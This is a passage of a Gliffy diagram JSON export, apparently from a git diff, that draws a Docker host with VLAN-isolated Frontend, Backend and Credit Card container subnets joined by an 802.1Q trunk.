TValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.30.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":350.51767083236393,"y":87.47159983339776,"rotation":0.0,"id":478,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":79,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#cc0000","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":94.0,"y":155.01008788486848,"rotation":0.0,"id":463,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":78,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":464,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":77,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":465,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":75,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":466,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":73,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":80.0,"y":109.71008483311067,"rotation":0.0,"id":468,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":71,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.10.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.51767083236396,"y":95.47159983339776,"rotation":0.0,"id":469,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":70,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#38761d","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":341.0,"y":40.010087884868476,"rotation":0.0,"id":460,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":69,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":417,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":68,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":418,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":66,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":419,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":198.51767083236396,"y":41.471599833397754,"rotation":0.0,"id":459,"width":175.20345848455912,"height":79.73848499971291,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":62,"lockAspectRatio":false,"lockShape":false,"children":[{"x":17.482329167636067,"y":14.23848499971291,"rotation":0.0,"id":458,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":61,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.20.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":330,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":59,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#ff9900","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":279.0,"y":129.01008788486848,"rotation":0.0,"id":440,"width":5.0,"height":227.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#ff9900","fillColor":"#ff9900","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[4.000000000000057,-25.08952732449731],[4.000000000000114,176.01117206537933]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":56.0,"y":503.0913886978766,"rotation":0.0,"id":386,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":48,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Frontend

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":420.0100878848684,"rotation":0.0,"id":381,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":41,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":382,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":383,"width":98.00597014925374,"height":44.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.10.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":384,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":385,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":382.0,"y":420.0100878848684,"rotation":0.0,"id":376,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":31,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":377,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":378,"width":98.00597014925374,"height":44.0,"uid":null,"order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.30.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":379,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":380,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":214.0,"y":503.0100878848685,"rotation":0.0,"id":374,"width":135.0,"height":20.162601626016258,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Backend

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":376.0,"y":502.0100878848684,"rotation":0.0,"id":373,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Credit Cards

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":627.0,"y":99.94304076572786,"rotation":0.0,"id":364,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":25,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":363,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":342,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-183.0,310.0670471191406],[-183.0,292.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":410.0100878848684,"rotation":0.0,"id":363,"width":144.0,"height":117.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":218.0,"y":341.5100878848684,"rotation":0.0,"id":366,"width":132.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Parent: eth0.20

VLAN ID: 20

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":297.0,"y":89.94304076572786,"rotation":0.0,"id":356,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":22,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":353,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":343,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-13.0,320.0670471191406],[-13.0,302.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":222.0,"y":420.0100878848684,"rotation":0.0,"id":348,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":349,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":350,"width":98.00597014925374,"height":44.0,"uid":null,"order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.20.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":351,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":352,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":13,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":410.0100878848684,"rotation":0.0,"id":353,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":332.0100878848684,"rotation":0.0,"id":343,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":203.0,"y":307.5100878848684,"rotation":0.0,"id":333,"width":160.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 Interface

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":303.0,"y":240.51008788486845,"rotation":0.0,"id":323,"width":261.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":8,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

802.1Q Trunk - can be a single Ethernet link or Multiple Bonded Ethernet links

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.0,"y":291.0100878848684,"rotation":0.0,"id":290,"width":497.0,"height":80.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":543.5100878848684,"rotation":0.0,"id":282,"width":569.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host: Frontend, Backend & Credit Card App Tiers are Isolated but can still communicate inside parent interface or any other Docker hosts using the VLAN ID

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-33.0,"y":79.94304076572786,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":5,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":345,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":340,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[157.0,330.0670471191406],[157.0,312.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":410.0100878848684,"rotation":0.0,"id":345,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":323.0100878848684,"rotation":0.0,"id":276,"width":531.0,"height":259.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":19.609892022503004,"y":20.27621073737908,"rotation":355.62347411485274,"id":246,"width":540.0106597126834,"height":225.00000000000003,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":2,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":1.0,"y":99.94304076572786,"rotation":0.0,"id":394,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.5670471191406],[261.0,108.05111187584177]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.0,"y":90.94304076572786,"rotation":0.0,"id":481,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.56704711914062],[261.0,108.05111187584174]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":104}],"shapeStyles":{},"lineStyles":{"global":{"fill":"#999999","stroke":"#38761d","strokeWidth":3,"dashStyle":"1.0,1.0","orthoMode":2}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"14px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117295143,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git 